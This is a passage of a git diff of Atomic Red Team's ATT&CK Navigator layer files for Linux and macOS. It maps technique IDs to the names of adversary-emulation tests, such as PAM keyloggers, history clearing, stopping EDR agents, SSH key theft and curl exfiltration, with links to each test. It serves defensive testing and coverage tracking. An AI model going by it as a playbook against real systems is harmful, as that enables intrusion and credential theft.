Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":1,"enabled":true,"comment":"\n- System Network Connections Discovery Linux & MacOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":1,"enabled":true,"comment":"\n- At - Schedule a job\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":3,"enabled":true,"comment":"\n- Cron - Replace crontab with referenced file\n- Cron - Add script to all cron subfolders\n- Cron - Add script to /var/spool/cron/crontabs/ folder\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.006","score":3,"enabled":true,"comment":"\n- Create Systemd Service and Timer\n- Create a user level transient systemd service and timer\n- Create a system level transient systemd service and timer\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1056","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":5,"enabled":true,"comment":"\n- Living off the land Terminal Input Capture on Linux with pam.d\n- Logging bash history to syslog\n- Bash session based keylogger\n- SSHD PAM keylogger\n- Auditd keylogger\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1057","score":1,"enabled":true,"comment":"\n- Process Discovery - ps\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.004","score":11,"enabled":true,"comment":"\n- Create and Execute Bash Shell Script\n- Command-Line Interface\n- Harvest SUID executable files\n- LinEnum tool execution\n- New script file in the tmp directory\n- What shell is running\n- What shells are available\n- Command line scripts\n- Obfuscated command line scripts\n- Change login shell\n- Environment variable scripts\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.006","score":4,"enabled":true,"comment":"\n- Execute shell script via python's command mode arguement\n- Execute Python via scripts (Linux)\n- Execute Python via Python executables (Linux)\n- Python pty module and spawn function used to spawn sh or bash\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1069","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":1,"enabled":true,"comment":"\n- Permission Groups Discovery (Local)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1070","score":20,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070.002","score":3,"enabled":true,"comment":"\n- rm -rf\n- Overwrite Linux Mail Spool\n- Overwrite Linux Log\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":9,"enabled":true,"comment":"\n- Clear Bash history (rm)\n- Clear Bash history (echo)\n- Clear Bash history (cat dev/null)\n- Clear Bash history (ln dev/null)\n- Clear Bash history (truncate)\n- Clear history of a bunch of shells\n- Clear and Disable Bash History Logging\n- Use Space Before Command to Avoid Logging to History\n- Disable Bash History Logging with SSH -T\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":4,"enabled":true,"comment":"\n- Delete a single file - Linux/macOS\n- Delete an entire folder - Linux/macOS\n- Overwrite and delete a file with shred\n- Delete Filesystem - Linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.006","score":4,"enabled":true,"comment":"\n- Set a file's access timestamp\n- Set a file's modification timestamp\n- Set a file's creation timestamp\n- Modify file timestamps using reference file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1071","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":1,"enabled":true,"comment":"\n- Malicious User Agents - Nix\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1074","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":1,"enabled":true,"comment":"\n- Stage data from Discovery.sh\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1082","score":6,"enabled":true,"comment":"\n- List OS Information\n- Linux VM Check via Hardware\n- Linux VM Check via Kernel Modules\n- Hostname Discovery\n- Environment variables discovery on macos and linux\n- Linux List Kernel Modules\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":2,"enabled":true,"comment":"\n- Nix File and Directory Discovery\n- Nix File and Directory Discovery 2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":6,"enabled":true,"comment":"\n- Enumerate all accounts (Local)\n- View sudoers access\n- View accounts with UID 0\n- List opened files by user\n- Show if a user account has ever logged in remotely\n- Enumerate users and groups\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1090","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":1,"enabled":true,"comment":"\n- Connection Proxy\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":1,"enabled":true,"comment":"\n- Tor Proxy Usage - Debian/Ubuntu\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1098","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.004","score":1,"enabled":true,"comment":"\n- Modify SSH Authorized Keys\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1105","score":8,"enabled":true,"comment":"\n- rsync remote file copy (push)\n- rsync remote file copy (pull)\n- scp remote file copy (push)\n- scp remote file copy (pull)\n- sftp remote file copy (push)\n- sftp remote file copy (pull)\n- whois file download\n- Linux Download File and Run\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1110","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":2,"enabled":true,"comment":"\n- SUDO brute force Debian\n- SUDO brute force Redhat\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.004","score":1,"enabled":true,"comment":"\n- SSH Credential Stuffing From Linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1113","score":2,"enabled":true,"comment":"\n- X Windows Capture\n- Capture Linux Desktop using Import Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1115","score":1,"enabled":true,"comment":"\n- Add or copy content to clipboard with xClip\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1132","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":1,"enabled":true,"comment":"\n- Base64 Encoded data.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1135","score":1,"enabled":true,"comment":"\n- Network Share Discovery - linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":2,"enabled":true,"comment":"\n- Create a user account on a Linux system\n- Create a new user in Linux with `root` UID and GID.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1140","score":5,"enabled":true,"comment":"\n- Base64 decoding with Python\n- Base64 decoding with Perl\n- Base64 decoding with shell utilities\n- Hex decoding with shell utilities\n- Linux Base64 Encoded Shebang in CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":3,"enabled":true,"comment":"\n- Chrome (Developer Mode)\n- Chrome (Chrome Web Store)\n- Firefox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1201","score":4,"enabled":true,"comment":"\n- Examine password complexity policy - Ubuntu\n- Examine password complexity policy - CentOS/RHEL 7.x\n- Examine password complexity policy - CentOS/RHEL 6.x\n- Examine password expiration policy - All Linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1217","score":1,"enabled":true,"comment":"\n- List Mozilla Firefox Bookmark Database Files on Linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1222","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.002","score":11,"enabled":true,"comment":"\n- chmod - Change file or folder mode (numeric mode)\n- chmod - Change file or folder mode (symbolic mode)\n- chmod - Change file or folder mode (numeric mode) recursively\n- chmod - Change file or folder mode (symbolic mode) recursively\n- chown - Change file or folder ownership and group\n- chown - Change file or folder ownership and group recursively\n- chown - Change file or folder mode ownership only\n- chown - Change file or folder ownership recursively\n- chattr - Remove immutable file attribute\n- Chmod through c script\n- Chown through c script\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1485","score":1,"enabled":true,"comment":"\n- macOS/Linux - Overwrite file with DD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":4,"enabled":true,"comment":"\n- Encrypt files using gpg (Linux)\n- Encrypt files using 7z (Linux)\n- Encrypt files using ccrypt (Linux)\n- Encrypt files using openssl (Linux)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1496","score":1,"enabled":true,"comment":"\n- macOS/Linux - Simulate CPU Load with Yes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":1,"enabled":true,"comment":"\n- Detect Virtualization Environment (Linux)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1518","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518.001","score":1,"enabled":true,"comment":"\n- Security Software Discovery - ps (Linux)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1529","score":7,"enabled":true,"comment":"\n- Restart System via `shutdown` - macOS/Linux\n- Shutdown System via `shutdown` - macOS/Linux\n- Restart System via `reboot` - macOS/Linux\n- Shutdown System via `halt` - Linux\n- Reboot System via `halt` - Linux\n- Shutdown System via `poweroff` - Linux\n- Reboot System via `poweroff` - Linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1543","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.002","score":2,"enabled":true,"comment":"\n- Create Systemd Service\n- Create Systemd Service file,  Enable the service , Modify and Reload the service.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1546","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}]},{"techniqueID":"T1546.004","score":5,"enabled":true,"comment":"\n- Add command to .bash_profile\n- Add command to .bashrc\n- Append to the system shell profile\n- Append commands user shell profile\n- System shell profile scripts\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546.005","score":2,"enabled":true,"comment":"\n- Trap EXIT\n- Trap SIGINT\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1547","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}]},{"techniqueID":"T1547.006","score":1,"enabled":true,"comment":"\n- Linux - Load Kernel Module via insmod\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1548","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.001","score":7,"enabled":true,"comment":"\n- Make and modify binary from C source\n- Set a SetUID flag on file\n- Set a SetGID flag on file\n- Make and modify capabilities of a binary\n- Provide the SetUID capability to a file\n- Do reconnaissance for files that have the setuid bit set\n- Do reconnaissance for files that have the setgid bit set\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548.003","score":3,"enabled":true,"comment":"\n- Sudo usage\n- Unlimited sudo cache timeout\n- Disable tty_tickets for sudo caching\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1552","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}],"comment":"\n- AWS - Retrieve EC2 Password Data using stratus\n"},{"techniqueID":"T1552.001","score":2,"enabled":true,"comment":"\n- Extract passwords with grep\n- Find and Access Github Credentials\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.003","score":1,"enabled":true,"comment":"\n- Search Through Bash History\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":4,"enabled":true,"comment":"\n- Discover Private SSH Keys\n- Copy Private SSH Keys with CP\n- Copy Private SSH Keys with rsync\n- Copy the users GnuPG directory with rsync\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.007","score":1,"enabled":true,"comment":"\n- Cat the contents of a Kubernetes service account token file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1553","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.004","score":2,"enabled":true,"comment":"\n- Install root CA on CentOS/RHEL\n- Install root CA on Debian/Ubuntu\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1555","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555.003","score":1,"enabled":true,"comment":"\n- LaZagne.py - Dump Credentials from Firefox Browser\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1556","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.003","score":2,"enabled":true,"comment":"\n- Malicious PAM rule\n- Malicious PAM module\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1560","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560.001","score":4,"enabled":true,"comment":"\n- Data Compressed - nix - zip\n- Data Compressed - nix - gzip Single File\n- Data Compressed - nix - tar Folder or File\n- Data Encrypted with zip and gpg symmetric\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560.002","score":4,"enabled":true,"comment":"\n- Compressing data using GZip in Python (Linux)\n- Compressing data using bz2 in Python (Linux)\n- Compressing data using zipfile in Python (Linux)\n- Compressing data using tarfile in Python (Linux)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1562","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":9,"enabled":true,"comment":"\n- Disable syslog\n- Disable Cb Response\n- Disable SELinux\n- Stop Crowdstrike Falcon on Linux\n- Clear History\n- Suspend History\n- Reboot Linux Host via Kernel System Request\n- Clear Pagging Cache\n- Disable Memory Swap\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.003","score":2,"enabled":true,"comment":"\n- Disable history collection\n- Mac HISTCONTROL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":9,"enabled":true,"comment":"\n- Stop/Start UFW firewall\n- Stop/Start UFW firewall systemctl\n- Turn off UFW logging\n- Add and delete UFW firewall rules\n- Edit UFW firewall user.rules file\n- Edit UFW firewall ufw.conf file\n- Edit UFW firewall sysctl.conf file\n- Edit UFW firewall main configuration file\n- Tail the UFW firewall log file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":2,"enabled":true,"comment":"\n- Auditing Configuration Changes on Linux Host\n- Logging Configuration Changes on Linux Host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":3,"enabled":true,"comment":"\n- AWS - Disable CloudTrail Logging Through Event Selectors using Stratus\n- AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus\n- AWS - Remove VPC Flow Logs using Stratus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1564","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.001","score":1,"enabled":true,"comment":"\n- Create a hidden file in a hidden directory\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1569","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.002","score":1,"enabled":true,"comment":"\n- psexec.py (Impacket)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1571","score":1,"enabled":true,"comment":"\n- Testing usage of uncommonly used port\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1574","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.006","score":2,"enabled":true,"comment":"\n- Shared Library Injection via /etc/ld.so.preload\n- Shared Library Injection via LD_PRELOAD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1580","score":1,"enabled":true,"comment":"\n- AWS - EC2 Enumeration from Cloud Instance\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1614","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":4,"enabled":true,"comment":"\n- Discover System Language with locale\n- Discover System Language with localectl\n- Discover System Language by locale file\n- Discover System Language by Environment Variable Query\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json
index 51aed886..f00cb221 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json
@@ -1 +1 @@
-{"name":"Atomic Red Team (macOS)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team (macOS) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{"platforms":["macOS"]},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1016","score":2,"enabled":true,"comment":"\n- System Network Configuration Discovery\n- List macOS Firewall Rules\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":2,"enabled":true,"comment":"\n- Remote System Discovery - arp nix\n- Remote System Discovery - sweep\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1027","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}],"comment":"\n- Decode base64 Data into Script\n"},{"techniqueID":"T1027.001","score":1,"enabled":true,"comment":"\n- Pad Binary to Change Hash - Linux/macOS dd\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":2,"enabled":true,"comment":"\n- Binary simply packed by UPX\n- Binary packed by UPX, with modified headers\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":3,"enabled":true,"comment":"\n- C compile\n- CC compile\n- Go compile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1030","score":1,"enabled":true,"comment":"\n- Data Transfer Size Limits\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":1,"enabled":true,"comment":"\n- System Owner/User Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036.005","score":1,"enabled":true,"comment":"\n- Execute a process from a directory masquerading as the current parent directory.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":2,"enabled":true,"comment":"\n- Space After Filename (Manual)\n- Space After Filename\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.002","score":1,"enabled":true,"comment":"\n- Logon Scripts - Mac\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037.004","score":1,"enabled":true,"comment":"\n- rc.common\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":1,"enabled":true,"comment":"\n- Add file to Local Library StartupItems\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1040","score":3,"enabled":true,"comment":"\n- Packet Capture macOS using tcpdump or tshark\n- Packet Capture macOS using /dev/bpfN with sudo\n- Filtered Packet Capture macOS using /dev/bpfN with sudo\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1046","score":2,"enabled":true,"comment":"\n- Port Scan\n- Port Scan Nmap\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1048","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}],"comment":"\n- Exfiltration Over Alternative Protocol - SSH\n- Exfiltration Over Alternative Protocol - SSH\n"},{"techniqueID":"T1048.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data HTTPS using curl linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":1,"enabled":true,"comment":"\n- Exfiltration Over Alternative Protocol - HTTP\n","links":[{"label":"View 